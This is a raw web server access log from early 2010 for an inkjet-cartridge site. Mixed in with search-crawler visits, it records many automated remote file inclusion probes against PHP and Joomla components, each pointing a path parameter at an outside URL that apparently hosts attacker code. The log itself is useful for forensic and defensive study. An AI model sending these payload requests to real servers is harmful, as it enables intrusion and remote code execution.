69.175.35.138 - - [28/Feb/2010:22:04:19 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.175.35.138 - - [28/Feb/2010:22:04:19 -0800] "GET /logs//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.175.35.138 - - [28/Feb/2010:22:04:47 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.230.93.144 - - [28/Feb/2010:22:14:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
87.230.93.144 - - [28/Feb/2010:22:14:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
87.230.93.144 - - [28/Feb/2010:22:14:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
87.230.93.144 - - [28/Feb/2010:22:14:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
67.195.115.218 - - [28/Feb/2010:22:25:23 -0800] "GET /links/links8_3.html HTTP/1.0" 200 17720 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [28/Feb/2010:22:30:29 -0800] "GET /phpbb/search.php HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [28/Feb/2010:22:38:25 -0800] "GET /phpbb/viewtopic.php?p=16535 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:41:00 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:41:00 -0800] "GET /logs/access.log//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:41:00 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:41:03 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:41:03 -0800] "GET /logs/access.log//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:41:03 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:42:48 -0800] "GET /logs/access.log//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:42:48 -0800] "GET /logs/access.log//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:42:48 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:42:48 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:42:48 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:42:48 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:42:59 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:42:59 -0800] "GET /logs/access.log%20%20//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:42:59 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:43:50 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:43:50 -0800] "GET /logs/access.log%20%20//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.106.132.3 - - [28/Feb/2010:22:43:50 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:45:01 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:45:01 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:45:01 -0800] "GET /logs/access.log%20%20//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:45:05 -0800] "GET /function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:45:05 -0800] "GET /logs//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [28/Feb/2010:22:45:06 -0800] "GET /logs/access.log%20%20//function.inc.php?path=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:22:49:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:22:49:10 -0800] "GET /logs/access_091201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:22:49:10 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [28/Feb/2010:22:49:22 -0800] "GET /phpbb/viewtopic.php?p=5116 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:22:49:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:22:49:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:22:49:29 -0800] "GET /logs/access_091201.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [28/Feb/2010:22:56:43 -0800] "GET //vwar/backup/errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [28/Feb/2010:22:56:43 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
122.200.203.11 - - [28/Feb/2010:22:56:43 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.47.237.17 - - [28/Feb/2010:23:10:36 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.47.237.17 - - [28/Feb/2010:23:10:36 -0800] "GET /logs/scripts.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
211.47.237.17 - - [28/Feb/2010:23:10:36 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
110.45.145.178 - - [28/Feb/2010:23:21:58 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:27:32 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:29:48 -0800] "GET /logs/access_091201.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:30:09 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:31:34 -0800] "GET /logs/access_091201.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:39:27 -0800] "GET /logs/access_100101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:41:20 -0800] "GET /logs/access_100101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:41:25 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:47:31 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:47:31 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:47:31 -0800] "GET /logs/scripts.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
66.111.110.158 - - [28/Feb/2010:23:48:50 -0800] "GET /links/links19.html HTTP/1.1" 200 29321 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:50:51 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:50:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [28/Feb/2010:23:50:51 -0800] "GET /logs/scripts.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.104.40.170 - - [28/Feb/2010:23:52:49 -0800] "GET /logs/access.log%20%20/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.104.40.170 - - [28/Feb/2010:23:52:49 -0800] "GET /logs/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.104.40.170 - - [28/Feb/2010:23:52:49 -0800] "GET /setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.49 - - [28/Feb/2010:23:54:40 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
207.46.199.49 - - [28/Feb/2010:23:55:45 -0800] "GET /blog-mt/mt.cgi HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
216.104.40.170 - - [28/Feb/2010:23:56:41 -0800] "GET /logs/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.104.40.170 - - [28/Feb/2010:23:56:41 -0800] "GET /setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.104.40.170 - - [28/Feb/2010:23:56:41 -0800] "GET /logs/access.log%20%20/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [28/Feb/2010:23:57:35 -0800] "GET /phpbb/viewtopic.php?p=575 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:00:00:09 -0800] "GET /phpbb/viewtopic.php?p=374 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
110.45.145.178 - - [01/Mar/2010:00:01:43 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
110.45.145.178 - - [01/Mar/2010:00:01:43 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
110.45.145.178 - - [01/Mar/2010:00:01:44 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:00:01:53 -0800] "GET /phpbb/viewtopic.php?t=333 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
216.104.40.170 - - [01/Mar/2010:00:02:13 -0800] "GET /logs/access.log/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:00:03:01 -0800] "GET /phpbb/viewtopic.php?p=31 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:00:03:07 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
116.127.121.117 - - [01/Mar/2010:00:03:08 -0800] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.104.40.170 - - [01/Mar/2010:00:06:12 -0800] "GET /logs/access.log/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:00:14:06 -0800] "GET /phpbb/viewtopic.php?t=946 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:00:23:28 -0800] "GET /phpbb/viewtopic.php?t=250 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
65.55.115.150 - - [01/Mar/2010:00:51:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:00:56:50 -0800] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:00:56:51 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:00:56:51 -0800] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:00:57:03 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:00:57:03 -0800] "GET /logs/access.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:00:57:06 -0800] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:01:02:46 -0800] "GET /phpbb/viewtopic.php?t=1474&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:01:05:35 -0800] "GET /phpbb/viewtopic.php?p=2389 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:01:21:29 -0800] "GET /phpbb/viewtopic.php?p=5132 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:01:27:37 -0800] "GET /phpbb/viewtopic.php?t=996 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:01:33:59 -0800] "GET /logs/ HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:01:56:04 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:01:56:04 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:01:56:04 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.195.241 - - [01/Mar/2010:01:57:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:02:00:45 -0800] "GET /phpbb/viewtopic.php?t=231 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:02:01:50 -0800] "GET /phpbb/viewtopic.php?p=78 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:02:03:36 -0800] "GET /phpbb/viewtopic.php?p=361 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.195.241 - - [01/Mar/2010:02:09:22 -0800] "GET /images/?D=D HTTP/1.1" 200 90945 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:02:11:46 -0800] "GET /logs/?D=A HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:02:14:06 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:02:14:06 -0800] "GET /include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.108.237.12 - - [01/Mar/2010:02:14:07 -0800] "GET /logs/access_100101.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:02:18:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:02:18:38 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.150.78.218 - - [01/Mar/2010:02:18:38 -0800] "GET /logs/access_100101.log//include/admin.lib.inc.php?site_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:02:18:43 -0800] "GET /phpbb/profile.php?mode=viewprofile&u=39 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:02:21:22 -0800] "GET /tmp/mailError.log HTTP/1.0" 200 28504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
